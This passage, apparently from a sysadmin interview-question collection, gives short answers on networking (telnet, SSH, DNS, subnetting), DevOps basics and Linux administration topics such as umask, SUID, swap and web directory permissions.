telnet code42.example.com 5432 # with nc (netcat) command: nc -vz code42.example.com 5432 ``` </details> <details> <summary><b>Why should you avoid <code>telnet</code> to administer a system remotely?</b></summary><br> Modern operating systems have turned off all potentially insecure services by default. On the other hand, some vendors of network devices still allow to establish communication using the telnet protocol. **Telnet** uses most insecure method for communication. It sends data across the network in plain text format and anybody can easily find out the password using the network tool. In the case of **Telnet**, these include the passing of login credentials in plain text, which means anyone running a sniffer on your network can find the information he needs to take control of a device in a few seconds by eavesdropping on a **Telnet** login session. Useful resources: - [Telnet and SSH as a secure alternative](https://www.ssh.com/ssh/telnet) - [How to telnet to an IP address on a specific port?](https://superuser.com/questions/339107/how-to-telnet-to-an-ip-address-on-a-specific-port) </details> <details> <summary><b>What is the difference between <code>wget</code> and <code>curl</code>?</b></summary><br> The main differences are: `wget's` major strong side compared to `curl` is its ability to download recursively. `wget` is command line only. `curl` supports FTP, FTPS, HTTP, HTTPS, SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS, FILE, POP3, IMAP, SMTP, RTMP and RTSP. Useful resources: - [What is the difference between curl and wget? (original)](https://unix.stackexchange.com/questions/47434/what-is-the-difference-between-curl-and-wget) </details> <details> <summary><b>What is SSH and how does it work?</b></summary><br> **SSH** stands for **Secure Shell**. It is a protocol that lets you drop from a server "A" into a shell session to a server "B". It allows you interact with your server "B". An **SSH** connection to be established, the remote machine (server A) must be running a piece of software called an **SSH** daemon and the user's computer (server B) must have an **SSH** client. The **SSH** daemon and **SSH** client listen for connections on a specific network port (default 22), authenticates connection requests, and spawns the appropriate environment if the user provides the correct credentials. Useful resources: - [Understanding the SSH Encryption and Connection Process](https://www.digitalocean.com/community/tutorials/understanding-the-ssh-encryption-and-connection-process) </details> <details> <summary><b>Most tutorials suggest using SSH key authentication rather than password authentication. Why it is considered more secure?</b></summary><br> An **SSH key** is an access credential in the SSH protocol. Its function is similar to that of user names and passwords, but the keys are primarily used for automated processes and for implementing single sign-on by system administrators and power users. Instead of requiring a user's password, it is possible to confirm the client's identity by using asymmetric cryptography algorithms, with public and private keys. If your SSH service only allows public-key authentication, an attacker needs a copy of a private key corresponding to a public key stored on the server. If your SSH service allows password based authentication, then your Internet connected SSH server will be hammered day and night by bot-nets trying to guess user-names and passwords. The bot net needs no information, it can just try popular names and popular passwords. Apart from anything else this clogs your logs. Useful resources: - [Key-Based Authentication (Public Key Authentication)](http://www.crypto-it.net/eng/tools/key-based-authentication.html) - [SSH password vs. key authentication](https://security.stackexchange.com/questions/33381/ssh-password-vs-key-authentication) </details> <details> <summary><b>What is a packet filter and how does it work?</b></summary><br> **Packet filtering** is a firewall technique used to control network access by monitoring outgoing and incoming packets and allowing them to pass or halt based on the source and destination Internet Protocol (IP) addresses, protocols and ports. Packet filtering is appropriate where there are modest security requirements. The internal (private) networks of many organizations are not highly segmented. Highly sophisticated firewalls are not necessary for isolating one part of the organization from another. However it is prudent to provide some sort of protection of the production network from a lab or experimental network. A packet filtering device is a very appropriate measure for providing isolation of one subnet from another. Operating at the network layer and transport layer of the TCP/IP protocol stack, every packet is examined as it enters the protocol stack. The network and transport headers are examined closely for the following information: - **protocol (IP header, network layer)** - in the IP header, byte 9 (remember the byte count begins with zero) identifies the protocol of the packet. Most filter devices have the capability to differentiate between TCP, UPD, and ICMP. - **source address (IP header, network layer)** - the source address is the 32-bit IP address of the host which created the packet. - **destination address (IP header, network layer)** - the destination address is the 32-bit IP address of the host the packet is destined for. - **source port (TCP or UDP header, transport layer)** - each end of a TCP or UDP network connection is bound to a port. TCP ports are separate and distinct from UDP ports. Ports numbered below 1024 are reserved – they have a specifically defined use. Ports numbered above 1024 (inclusive) are known as ephemeral ports. They can be used however a vendor chooses. For a list of "well known" ports, refer to RFP1700. The source port is a pseudo-randomly assigned ephemeral port number. Thus it is often not very useful to filter on the source port. - **destination port (TCP or UDP header, transport layer)** - the destination port number indicates a port that the packet is sent to. Each service on the destination host listens to a port. Some well-known ports that might be filtered are 20/TCP and 21/TCP - ftp connection/data, 23/TCP - telnet, 80/TCP - http, and 53/TCP - DNS zone transfers. - **connection status (TCP header, transport layer)** - the connection status tells whether the packet is the first packet of the network session. The ACK bit in the TCP header is set to “false” or 0 if this is the first packet in the session. It is simple to disallow a host from establishing a connection by rejecting or discarding any packets which have the ACK bit set to "false" or 0. Useful resources: - [Building Internet Firewalls - Packet Filtering](http://web.deu.edu.tr/static/oreily/networking/firewall/ch06_01.htm) </details> <details> <summary><b>What are the advantages of using a reverse proxy server?</b></summary><br> **Hide the topology and characteristics of your back-end servers** The **reverse proxy server** can hide the presence and characteristics of the origin server. It acts as an intermediate between internet cloud and web server. It is good for security reason especially when you are using web hosting services. **Allows transparent maintenance of backend servers** Changes you make to servers running behind a reverse proxy are going to be completely transparent to your end users. **Load Balancing** The reverse proxy will then enforce a load balancing algorithm like round robin, weighted round robin, least connections, weighted least connections, or random, to distribute the load among the servers in the cluster. When a server goes down, the system will automatically failover to the next server up and users can continue with their secure file transfer activities. **SSL offloading/termination** Handles incoming HTTPS connections, decrypting the requests and passing unencrypted requests on to the web servers. **IP masking** Using a single ip but different URLs to route to different back end servers. Useful resources: - [The Benefits of a Reverse Proxy](https://dzone.com/articles/benefits-reverse-proxy) </details> <details> <summary><b>What is the difference between a router and a gateway? What is the default gateway?</b></summary><br> **Router** describes the general technical function (layer-3 forwarding) or a hardware device intended for that purpose, while gateway describes the function for the local segment (providing connectivity to elsewhere). You could also state that "_you set up a router as gateway_". Another term is hop which describes the forwarding in between subnets. The term **default gateway** is used to mean the router on your LAN which has the responsibility of being the first point of contact for traffic to computers outside the LAN. It's just a matter of perspective, the device is the same. Useful resources: - [Difference between router and gateway (orignal)](https://networkengineering.stackexchange.com/questions/51426/difference-between-router-and-gateway) </details> <details> <summary><b>Explain the function of each of the following DNS records: SOA, PTR, A, MX, and CNAME.</b></summary><br> **DNS records** are basically mapping files that tell the DNS server which IP address each domain is associated with, and how to handle requests sent to each domain. Some **DNS records** syntax that are commonly used in nearly all DNS record configurations are `A`, `AAAA`, `CNAME`, `MX`, `PTR`, `NS`, `SOA`, `SRV`, `TXT`, and `NAPTR`. - **SOA** - A Start Of Authority - **A** - Address Mapping records - **AAAA** - IP Version 6 Address records - **CNAME** - Canonical Name records - **MX** - Mail exchanger record - **NS** - Name Server records - **PTR** - Reverse-lookup Pointer records Useful resources: - [List of DNS record types](https://en.wikipedia.org/wiki/List_of_DNS_record_types) </details> <details> <summary><b>Why couldn't MAC addresses be used instead of IPv4/6 for networking?</b></summary><br> The **OSI** model explains why it doesn't make sense to make routing, a **layer 3** concept, decisions based on a physical, **layer 2**, mechanism. Modern networking is broken into many different layers to accomplish your end to end communication. Your network card (what is addressed by the mac address - physical address) needs to only be responsible for communicating with peers on it's physical network. The communication that you are allowed to accomplish with your **MAC** address is going to be limited to other devices that reside within physical contact to your machine. On the internet, for example, you are not physically connected to each machine. That's why we make use of **TCP/IP** (a **layer 3**, logical address) mechanism when we need to communicate with a machine that we are not physically connected to. **IP** is an arbitrary numbering scheme imposed in a hierarchical fashion on a group of computers to logically distinguish them as a group (that's what a subnet is). Sending messages between those groups is done by routing tables, themselves divided into multiple levels so that we don't have to keep track of every single subnet. It's also pretty easy to relate this to another pair of systems. You have a State Issued ID Number, why would you need a mailing address if that ID number is already unique to just you? You need the mailing address because it's an arbitrary system that describes where the unique destination for communications to you should go. On the other hand, the distribution of **MAC** addresses across the network is random and completely unrelated to topology. Routes grouping would be impossible, every router would need to keep track of routes for every single device that relays traffic trough it. That is what **layer 2** switches do, and that does not scale well beyond a certain number of hosts. Useful resources: - [Why couldn't MAC addresses be used instead of IPv4|6 for networking? (original)](https://serverfault.com/questions/410626/why-couldnt-mac-addresses-be-used-instead-of-ipv46-for-networking) </details> <details> <summary><b>What is the smallest IPv4 subnet mask that can be applied to a network containing up to 30 devices?</b></summary><br> Whether you have a standard `/24` VLAN for end users, a `/30` for point-to-point links, or something in between and subnet that must contain up to 30 devices works out to be a `/27` - or a subnet mask of `255.255.255.224`. Useful resources: - [How do you calculate the prefix, network, subnet, and host numbers?](https://networkengineering.stackexchange.com/questions/7106/how-do-you-calculate-the-prefix-network-subnet-and-host-numbers) - [The slash after an IP Address - CIDR Notation](https://networkengineering.stackexchange.com/questions/3697/the-slash-after-an-ip-address-cidr-notation) - [Why are there 3 ranges of private IPv4 addresses?](https://networkengineering.stackexchange.com/questions/32119/why-are-there-3-ranges-of-private-ipv4-addresses) - [IP Calculator](http://jodies.de/ipcalc) </details> <details> <summary><b>What are some common HTTP status codes?</b></summary><br> - **1xx** - Informational responses - communicates transfer protocol-level information - **2xx** - Success - indicates that the client’s request was accepted successfully - **3xx** - Redirection - indicates that the client must take some additional action in order to complete their request - **4xx** - Client side error - this category of error status codes points the finger at clients - **5xx** - Server side error - the server takes responsibility for these error status codes Useful resources: - [HTTP Status Codes](https://httpstatuses.com/) </details> ###### Devops Questions (5) <details> <summary><b>What is DevOps? Which is more important to the success of any DevOps community: how people communicate or the tools that you choose to deploy? ***</b></summary><br> **DevOps** is a cohesive team that engages in both Development and Operations tasks, or it's individual Operations and Development teams that work very closely together. It's more of a "way" of working collaboratively with other departments to achieve common goals. </details> <details> <summary><b>What is a version control? Are your commit messages good looking?</b></summary><br> It is a system that records changes to a file or set of files over time so that you can recall specific versions later. Version control systems consist of a central shared repository where teammates can commit changes to a file or set of file. Then you can mention the uses of version control. Version control allows you to: - revert files back to a previous state - revert the entire project back to a previous state - compare changes over time - see who last modified something that might be causing a problem - who introduced an issue and when The seven rules of a great commit message: - separate subject from body with a blank line - limit the subject line to 50 characters - capitalize the subject line - do not end the subject line with a period - use the imperative mood in the subject line - wrap the body at 72 characters - use the body to explain what and why vs. how Useful resources: - [Getting Started - About Version Control (original)](https://git-scm.com/book/en/v2/Getting-Started-About-Version-Control) </details> <details> <summary><b>Explain some basic <code>git</code> commands.</b></summary><br> - `git init` - create a new local repository - `git commit -m "message"` - commit changes to head - `git status` - list the files you've added with `git add` and also commit any files you've changed since then - `git push origin master` - send changes to the master branch of your remote repository </details> <details> <summary><b>Explain a simple Continuous Integration pipeline.</b></summary><br> - clone repository - deploy stage (QA) - testing environment (QA) - deploy stage (PROD) </details> <details> <summary><b>Explain some basic <code>docker</code> commands.</b></summary><br> - `docker ps` - show running containers - `docker ps -a` - show all containers - `docker images` - show docker images - `docker logs <container-id|container-name>` - get logs from container - `docker network ls` - show all docker networks - `docker volumes ls` - show all docker volumes - `docker exec -it <container-id|container-name> bash` - execute bash in container with interactive shell </details> ###### Cyber Security Questions (1) <details> <summary><b>What is a Security Misconfiguration?</b></summary><br> **Security misconfiguration** is a vulnerability when a device/application/network is configured in a way which can be exploited by an attacker to take advantage of it. This can be as simple as leaving the default username/password unchanged or too simple for device accounts etc. </details> ### :diamond_shape_with_a_dot_inside: <a name="regular-sysadmin">Regular Sysadmin</a> ###### System Questions (60) <details> <summary><b>Tell me about your experience with the production environments? ***</b></summary><br> To be completed. </details> <details> <summary><b>Which distribution would you select for running a major web server? ***</b></summary><br> To be completed. </details> <details> <summary><b>Explain in a few points the boot process of the Linux system.</b></summary><br> **BIOS**: Full form of BIOS is Basic Input or Output System that performs integrity checks and it will search and load and then it will execute the bootloader. **Bootloader**: Since the earlier phases are not specific to the operating system, the BIOS-based boot process for x86 and x86-64 architectures is considered to start when the master boot record (MBR) code is executed in real mode and the first-stage boot loader is loaded. In UEFI systems, a payload, such as the Linux kernel, can be executed directly. Thus no boot loader is necessary. Some popular bootloaders: **GRUB**, **Syslinux/Isolinux** or **Lilo**. **Kernel**: The kernel in Linux handles all operating system processes, such as memory management, task scheduling, I/O, interprocess communication, and overall system control. This is loaded in two stages - in the first stage, the kernel (as a compressed image file) is loaded into memory and decompressed, and a few fundamental functions such as basic memory management are set up. **Init**: Is the parent of all processes on the system, it is executed by the kernel and is responsible for starting all other processes. - `SysV init` - init's job is "to get everything running the way it should be once the kernel is fully running. Essentially it establishes and operates the entire user space. This includes checking and mounting file systems, starting up necessary user services, and ultimately switching to a user-environment when system startup is completed. - `systemd` - the developers of systemd aimed to replace the Linux init system inherited from Unix System V. Like init, systemd is a daemon that manages other daemons. All daemons, including systemd, are background processes. Systemd is the first daemon to start (during booting) and the last daemon to terminate (during shutdown). - `runinit` - runinit is an init scheme for Unix-like operating systems that initializes, supervises, and ends processes throughout the operating system. It is a reimplementation of the daemontools process supervision toolkit that runs on the Linux, Mac OS X, \*BSD, and Solaris operating systems. Useful resources: - [Analyzing the Linux boot process](https://opensource.com/article/18/1/analyzing-linux-boot-process) - [Systemd Boot Process a Close Look in Linux](https://linoxide.com/linux-how-to/systemd-boot-process/) </details> <details> <summary><b>How and why Linux daemons drop privileges? Why some daemons need root permissions to start? Explain. ***</b></summary> To be completed. </details> <details> <summary><b>Why is a load of 1.00 not ideal on a single-core machine?</b></summary><br> The problem with a load of 1.00 is that you have no headroom. In practice, many sysadmins will draw a line at 0.70. The "Need to Look into it" Rule of Thumb: 0.70 If your load average is staying above > 0.70, it's time to investigate before things get worse. The "Fix this now" Rule of Thumb: 1.00. If your load average stays above 1.00, find the problem and fix it now. Otherwise, you're going to get woken up in the middle of the night, and it's not going to be fun. Rule of Thumb: 5.0. If your load average is above 5.00, you could be in serious trouble, your box is either hanging or slowing way down, and this will (inexplicably) happen in the worst possible time like in the middle of the night or when you're presenting at a conference. Don't let it get there. Useful resources: - [Proper way of interpreting system load on a 4 core 8 thread processor](https://serverfault.com/questions/618130/proper-way-of-interpreting-system-load-on-a-4-core-8-thread-processor) - [Understanding Linux CPU Load - when should you be worried?](http://blog.scoutapp.com/articles/2009/07/31/understanding-load-averages) </details> <details> <summary><b>What does it mean when the effective user is root, but the real user ID is still your name?</b></summary><br> The **real user ID** is who you really are (the user who owns the process), and the **effective user ID** is what the operating system looks at to make a decision whether or not you are allowed to do something (most of the time, there are some exceptions). When you log in, the login shell sets both the **real and effective user ID** to the same value (your **real user ID**) as supplied by the password file. If, for instance, you execute setuid, and besides running as another user (e.g. **root**) the setuid program is also supposed to do something on your behalf. After executing setuid, it will have your **real ID** (since you're the process owner) and the effective user id of the file owner (for example **root**) since it is setuid. Let's use the case of `passwd`: ```bash -rwsr-xr-x 1 root root 45396 may 25 2012 /usr/bin/passwd ``` When user2 wants to change their password, they execute `/usr/bin/passwd`. The **RUID** will be user2 but the **EUID** of that process will be root. user2 can use only passwd to change their own password, because internally passwd checks the **RUID** and, if it is not root, its actions will be limited to real user's password. It's necessary that the **EUID** becomes root in the case of passwd because the process needs to write to `/etc/passwd` and/or `/etc/shadow`. Useful resources: - [Difference between Real User ID, Effective User ID and Saved User ID? (original)](https://stackoverflow.com/questions/30493424/what-is-the-difference-between-a-process-pid-ppid-uid-euid-gid-and-egid) - [What is the difference between a pid, ppid, uid, euid, gid and egid?](https://stackoverflow.com/questions/30493424/what-is-the-difference-between-a-process-pid-ppid-uid-euid-gid-and-egid) </details> <details> <summary><b>Developer added cron job which generate massive log files. How do you prevent them from getting so big?</b></summary><br> Using `logrotate` is the usual way of dealing with logfiles. But instead of adding content to `/etc/logrotate.conf` you should add your own job to `/etc/logrotate.d/`, otherwise you would have to look at more diffs of configuration files during release upgrades. If it's actively being written to you don't really have much you can do by way of truncate. Your only options are to truncate the file: ```bash : >/var/log/massive-logfile ``` It's very helpful, because it's truncate the file without disrupting the processes. Useful resources: - [How to Use logrotate to Manage Log Files](https://www.linode.com/docs/uptime/logs/use-logrotate-to-manage-log-files/) - [System logging](https://www.ibm.com/developerworks/library/l-lpic1-108-2/index.html) </details> <details> <summary><b>How the Linux kernel creates, manages and deletes the processes in the system? ***</b></summary><br> To be completed. Useful resources: - [Linux Processes](https://www.tldp.org/LDP/tlk/kernel/processes.html) </details> <details> <summary><b>Explain the selected information you can see in <code>top</code> and <code>htop</code>. How to diagnose load, high user time and out-of-memory problems with these tools? ***</b></summary><br> To be completed. Useful resources: - [top explained visually](https://www.svennd.be/top-explained-visually/) - [htop Explained Visually](https://codeahoy.com/2017/01/20/hhtop-explained-visually/) - [Explanation of everything you can see in htop/top on Linux](https://peteris.rocks/blog/htop/) </details> <details> <summary><b>How would you recognize a process that is hogging resources? </b></summary><br> `top` works reasonably well, as long as you look at the right numbers. - **M** Sorts by current resident memory usage - **T** Sorts by total ( or cummulative) CPU usage - **P** Sorts by current CPU usage (this is the default refresh) - **?** Displays a usage summary for all top commands This is very important information to obtain when problem solving why a computer process is running slowly and making decisions on what processes to kill/software to uninstall. Useful resources: - [How to find the process(es) which are hogging the machine](https://superuser.com/questions/326300/how-to-find-the-processes-which-are-hogging-the-machine) </details> <details> <summary><b>You need to upgrade <code>ntpd</code> service at 200 servers. What is the best way to go about upgrading all of these to the latest?</b></summary><br> By using **Infrastructure as a Code** approach, there are multiple good ways: 1. **Configuration Synchronization Change Management Model**: There are Configuration Management Tools (Ansible, Chef, Puppet, Saltstack, ...), that can be used to automatically update `ntpd` service on all servers. To keep systems stable, system packages on servers are usually auto-updated with only security updates. Major or minor versions of packages are usually version locked in configuration definitions to prevent misconfiguration of the service. Change is then deployed by changing `ntpd` version in configuration definition. With this approach, it is important to be careful when deploying changes into infrastructure massively. The pipeline of deployment should include Unit, Integration and System tests, and eventually be first deployed into Staging environment to prove configuration. If tests prove configuration correctness, deployment should be done by incremental rollout with ability to rollback in case of errors or failure. 2. **Immutable Servers Model**: In Immutable Server model, whole unit (server, container) is replaced by new updated image rather than making changes to running server (this eliminates configuration drift). With this approach you usually build server image with tools like Packer or Docker with Dockerfile. This image is then tested and deployed similarly as in option above (1.), but now using techniques such as Canary Release, which also has ability to incremental rollout and rollback. Useful resources: - [Infrastructure as a Code - Chapter 8: Patterns for Updating and Changing Servers](http://shop.oreilly.com/product/0636920039297.do) </details> <details> <summary><b>How to permanently set <code>$PATH</code> on Linux/Unix? Why is this variable so important? ***</b></summary> To be completed. </details> <details> <summary><b>When your server is booting up some errors appears on the console. How to examine boot messages and where are they stored?</b></summary><br> Your console has two types of messages: - **generated by the kernel** (via printk) - **generated by userspace** (usually your init system) Kernel messages are always stored in the **kmsg** buffer, visible via `dmesg` command. They're also often copied to your **syslog**. This also applies to userspace messages written to `/dev/kmsg`, but those are fairly rare. Meanwhile, when userspace writes its fancy boot status text to `/dev/console` or `/dev/tty1`, it's not stored anywhere at all. It just goes to the screen and that's it. `dmesg` is used to review boot messages contained in the kernel ring buffer. A ring buffer is a buffer of fixed size for which any new data added to it overwrites the oldest data in it. It shows operations once the boot process has completed, such as command line options passed to the kernel; hardware components detected, events when a new USB device is added, or errors like NIC (Network Interface Card) failure and the drivers report no link activity detected on the network and so much more. If system logging is done via the journal component you should use `journalctl`. It shows messages include kernel and boot messages; messages from syslog or various services. Boot issues/errors calls for a system administrator to look into certain important files in conjunction with particular commands (handled differently by different versions of Linux): - `/var/log/boot.log` - system boot log, it contains all that unfolded during the system boot - `/var/log/messages` - stores global system messages, including the messages that are logged during system boot - `/var/log/dmesg` - contains kernel ring buffer information Useful resources: - [How to view all boot messages in Linux after booting? (original)](https://superuser.com/questions/1188407/how-to-view-all-boot-messages-in-linux-after-booting) - [Differences in /var/log/{syslog,dmesg,messages} log files](https://superuser.com/questions/565927/differences-in-var-log-syslog-dmesg-messages-log-files) - [How can the messages that scroll by when booting a Debian system be reviewed later?](https://serverfault.com/questions/516411/all-debian-boot-messages) </details> <details> <summary><b>Swap usage too high. What are the reasons for this and how to resolve swapping problems?</b></summary><br> **Swap** space is a restricted amount of physical memory that is allocated for use by the operating system when available memory has been fully utilized. It is memory management that involves swapping sections of memory to and from physical storage. If the system needs more memory resources and the RAM is full, inactive pages in memory are moved to the swap space. While swap space can help machines with a small amount of RAM, it should not be considered a replacement for more RAM. **Swap** space is located on hard drives, which have a slower access time than physical memory. Workload increases your RAM demand. You are running a workload that requires more memory. Usage of the entire swap indicates that. Also, changing `swappiness` to **1** might not be a wise decision. Setting `swappiness` to **1** does not indicate that swapping will not be done. It just indicates how aggressive kernel will be in respect of swapping, it does not eliminate swapping. Swapping will happen if needs to be done. - **Increasing the size of the swap space** - firstly, you'd have increased disk use. If your disks aren't fast enough to keep up, then your system might end up thrashing, and you'd experience slowdowns as data is swapped in and out of memory. This would result in a bottleneck. - **Adding more RAM** - the real solution is to add more memory. There's no substitute for RAM, and if you have enough memory, you'll swap less. For monitoring swap space usage: - `cat /proc/swaps` - to see total and used swap size - `grep SwapTotal /proc/meminfo` - to show total swap space - `free` - to display the amount of free and used system memory (also swap) - `vmstat` - to check swapping statistics - `top`, `htop`- to check swap space usage - `atop` - to show is that your system is overcommitting memory - or use one-liner shell command to list all applications with how much swap space search is using in kilobytes: ```bash for _fd in /proc/*/status ; do awk '/VmSwap|Name/{printf $2 " " $3}END{ print ""}' $_fd done | sort -k 2 -n -r | less ``` Useful resources: - [Linux ate my ram!](https://www.linuxatemyram.com/) - [How to find out which processes are using swap space in Linux?](https://stackoverflow.com/questions/479953/how-to-find-out-which-processes-are-using-swap-space-in-linux) - [8 Useful Commands to Monitor Swap Space Usage in Linux](https://www.tecmint.com/commands-to-monitor-swap-space-usage-in-linux/) - [What is the danger in having a fully used SWAP in an Ubuntu server?](https://serverfault.com/questions/499301/what-is-the-danger-in-having-a-fully-used-swap-in-an-ubuntu-server) - [How to empty swap if there is free RAM?](https://askubuntu.com/questions/1357/how-to-empty-swap-if-there-is-free-ram) </details> <details> <summary><b>What is umask? How to set it permanently for a user?</b></summary><br> On Linux and other Unix-like operating systems, new files are created with a default set of permissions. Specifically, a new file's permissions may be restricted in a specific way by applying a permissions "mask" called the `umask`. The `umask` command is used to set this mask, or to show you its current value. Permanently change (set e.g. `umask 02`): - `~/.profile` - `~/.bashrc` - `~/.zshrc` - `~/.cshrc` Useful resources: - [What is Umask and How To Setup Default umask Under Linux?](https://www.cyberciti.biz/tips/understanding-linux-unix-umask-value-usage.html) </details> <details> <summary><b>Explain the differences among the following umask values: 000, 002, 022, 027, 077, and 277.</b></summary><br> <table style="width:100%"> <tr> <th>Umask</th> <th>File result</th> <th>Directory result</th> </tr> <tr> <td>000</td> <td>666 rw- rw- rw-</td> <td>777 rwx rwx rwx</td> </tr> <tr> <td>002</td> <td>664 rw- rw- r--</td> <td>775 rwx rwx r-x</td> </tr> <tr> <td>022</td> <td>644 rw- r-- r--</td> <td>755 rwx r-x r-x</td> </tr> <tr> <td>027</td> <td>640 rw- r-- ---</td> <td>750 rwx r-x ---</td> </tr> <tr> <td>077</td> <td>600 rw---- ---</td> <td>700 rwx --- ---</td> </tr> <tr> <td>277</td> <td>400 r-- --- ---</td> <td>500 r-x --- ---</td> </tr> </table> Useful resources: - [What is Umask and How To Setup Default umask Under Linux?](https://www.cyberciti.biz/tips/understanding-linux-unix-umask-value-usage.html) </details> <details> <summary><b>What is the difference between a symbolic link and a hard link?</b></summary><br> Underneath the file system files are represented by inodes (or is it multiple inodes not sure) - a file in the file system is basically a link to an inode - a hard link then just creates another file with a link to the same underlying inode When you delete a file it removes one link to the underlying inode. The inode is only deleted (or deletable/over-writable) when all links to the inode have been deleted. - a symbolic link is a link to another name in the file system Once a hard link has been made the link is to the inode. deleting renaming or moving the original file will not affect the hard link as it links to the underlying inode. Any changes to the data on the inode is reflected in all files that refer to that inode. Note: Hard links are only valid within the same file system. Symbolic links can span file systems as they are simply the name of another file. Differences: - **Hardlink** cannot be created for directories. Hard link can only be created for a file - **Softlink** also termed a symbolic links or symlinks can link to a directory Useful resources: - [What is the difference between a hard link and a symbolic link?](https://medium.com/@wendymayorgasegura/what-is-the-difference-between-a-hard-link-and-a-symbolic-link-8c0493041b62) </details> <details> <summary><b>How does the sticky bit work? The <code>SUID/GUID</code> is the same?</b></summary><br> This is probably one of my most irksome things that people mess up all the time. The **SUID/GUID** bit and the **sticky-bit** are 2 completely different things. If you do a `man chmod` you can read about the **SUID** and **sticky-bits**. **SUID/GUID** What the above man page is trying to say is that the position that the x bit takes in the rwxrwxrwx for the user octal (1st group of rwx) and the group octal (2nd group of rwx) can take an additional state where the x becomes an s. When this occurs this file when executed (if it's a program and not just a shell script) will run with the permissions of the owner or the group of the file. So if the file is owned by root and the **SUID** bit is turned on, the program will run as root. Even if you execute it as a regular user. The same thing applies to the **GUID** bit. Examples: **no suid/guid** - just the bits `rwxr-xr-x` are set. ```bash ls -lt b.pl -rwxr-xr-x 1 root root 179 Jan 9 01:01 b.pl ``` **suid & user's executable bit enabled (lowercase s)** - the bits `rwsr-x-r-x` are set. ```bash chmod u+s b.pl ls -lt b.pl -rwsr-xr-x 1 root root 179 Jan 9 01:01 b.pl ``` **suid enabled & executable bit disabled (uppercase S)** - the bits `rwSr-xr-x` are set. ```bash chmod u-x b.pl ls -lt b.pl -rwSr-xr-x 1 root root 179 Jan 9 01:01 b.pl ``` **guid & group's executable bit enabled (lowercase s)** - the bits `rwxr-sr-x` are set. ```bash chmod g+s b.pl ls -lt b.pl -rwxr-sr-x 1 root root 179 Jan 9 01:01 b.pl ``` **guid enabled & executable bit disabled (uppercase S)** - the bits `rwxr-Sr-x` are set. ```bash chmod g-x b.pl ls -lt b.pl -rwxr-Sr-x 1 root root 179 Jan 9 01:01 b.pl ``` **sticky bit** The sticky bit on the other hand is denoted as `t`, such as with the `/tmp` directory: ```bash ls -l /|grep tmp drwxrwxrwt. 168 root root 28672 Jun 14 08:36 tmp ``` This bit should have always been called the _restricted deletion bit_ given that's what it really connotes. When this mode bit is enabled, it makes a directory such that users can only delete files & directories within it that they are the owners of. Useful resources: - [How does the sticky bit work? (original)](https://unix.stackexchange.com/questions/79395/how-does-the-sticky-bit-work) </details> <details> <summary><b>What does <code>LC_ALL=C</code> before command do? In what cases it will be useful?</b></summary><br> `LC_ALL` is the environment variable that overrides all the other localisation settings. This sets all `LC_` type variables at once to a specified locale. The main reason to set `LC_ALL=C` before command is that fine to simply get English output (general change the locale used by the command). On the other hand, also important is to increase the speed of command execution with `LC_ALL=C` e.g. `grep` or `fgrep`. Using the `LC_ALL=C` locale increased our performance and brought command execution time down. For example, if you set `LC_ALL=en_US.utf8` your system opened multiple files from the `/usr/lib/locale` directory. For `LC_ALL=C` a minimum amount of open and read operations is performed. If you want to restore all your normal (original) locale settings for the session: ```bash LC_ALL= ``` If `LC_ALL` does not work, try using `LANG` (if that still does not work, try `LANGUAGE`): ```bash LANG=C date +%A Monday ``` Useful resources: - [What does LC_ALL=C do? (original)](https://unix.stackexchange.com/questions/87745/what-does-lc-all-c-do) - [Speed up grep searches with LC_ALL=C](https://www.inmotionhosting.com/support/website/ssh/speed-up-grep-searches-with-lc-all) </details> <details> <summary><b>How to make high availability of web application? ***</b></summary> To be completed. </details> <details> <summary><b>You are configuring a new server. One of the steps is setting the permissions to the app directories. What steps will you take and what mistakes to avoid?</b></summary><br> **1) Main requirements - remember about this** - which users have access to the app filesystem - permissions for web servers, e.g. Apache and app servers e.g. uwsgi - permissions for specific directories like a **uploads**, **cache** and main app directory like a `/var/www/app01/html` - correct `umask` value for users and **suid**/**sgid** (only for specific situations) - permissions for all future files and directories - permissions for cron jobs and scripts **2) Application directories** `/var/www` contains a directory for each website (isolation of the apps), e.g. `/var/www/app01`, `/var/www/app02` ```bash mkdir /var/www/{app01,app02} ``` **3) Application owner and group** Each application has a designated **owner** (e.g. **u01-prod**, **u02-prod**) and **group** (e.g. **g01-prod**, **g02-prod**) which are set as the owner of all files and directories in the website's directory: ```bash chown -R u01-prod:g01-prod /var/www/app01 chown -R u02-prod:g02-prod /var/www/app02 ``` **4) Developers owner and group** All of the users that maintain the website have own groups and they're attach to application group: ```bash id alice uid=2000(alice) gid=4000(alice) groups=8000(g01-prod) id bob uid=2001(bob) gid=4001(bob) groups=8000(g01-prod),8001(g02-prod) ``` So **alice** user has standard privileges for `/var/www/app01` and **bob** user has standard privileges for `/var/www/app01` and `/var/www/app02`. **5) Web server owner and group** Any files or directories that need to be written by the webserver have their owner. If the web servers is Apache, default owner/group are **apache:apache** or **www-data:www-data** and for Nginx it will be **nginx:nginx**. Don't change these settings. If applications works with app servers like a **uwsgi** or **php-fpm** should set the appropriate user and group (e.g. for **app01** it will be **u01-prod:g01-prod**) in specific config files. **6) Permissions** Set properly permissions with **Access Control Lists**: ```bash # For web server setfacl -Rdm "g:apache:rwx" /var/www/app01 setfacl -Rm "g:apache:rwx" /var/www/app01 # For developers setfacl -Rdm "g:g01-prod:rwx" /var/www/app01 setfacl -Rm "g:g01-prod:rwx" /var/www/app01 ``` If you use **SELinux** remember about security context: ```bash chcon -R system_u:object_r:httpd_sys_content_t /var/www/app01 ``` **7) Security mistakes** - **root** owner for files and directories - **root** never executes any files in website directory, and shouldn't be creating files in there - to wide permissions like a **777** so some critical files may be world-writable and world-readable - avoid creating maintenance scripts or other critical files with suid root If you allow your site to modify the files which form the code running your site, you make it much easier for someone to take over your server. A file upload tool allows users to upload a file with any name and any contents. This allows a user to upload a mail relay PHP script to your site, which they can place wherever they want to turn your server into a machine to forward unsolicited commercial email. This script could also be used to read every email address out of your database, or other personal information. If the malicious user can upload a file with any name but not control the contents, then they could easily upload a file which overwrites your `index.php` (or another critical file) and breaks your site. Useful resources: - [How to setup linux permissions for the WWW folder?](https://serverfault.com/questions/124800/how-to-setup-linux-permissions-for-the-www-folder) - [What permissions should my website files/folders have on a Linux webserver?](https://serverfault.com/questions/357108/what-permissions-should-my-website-files-folders-have-on-a-linux-webserver) - [Security Pitfalls of setgid Programs](https://www.agwa.name/blog/post/security_pitfalls_of_setgid_programs) </details> <details> <summary><b>What steps will be taken by init when you run <code>telinit 1</code> from run level 3? What will be the final result of this? If you use <code>telinit 6</code> instead of <code>reboot</code> command your server will be restarted? ***</b></summary><br> To be completed. Useful resources: - [What differences it will make, if i use “telinit 6” instead of “reboot” 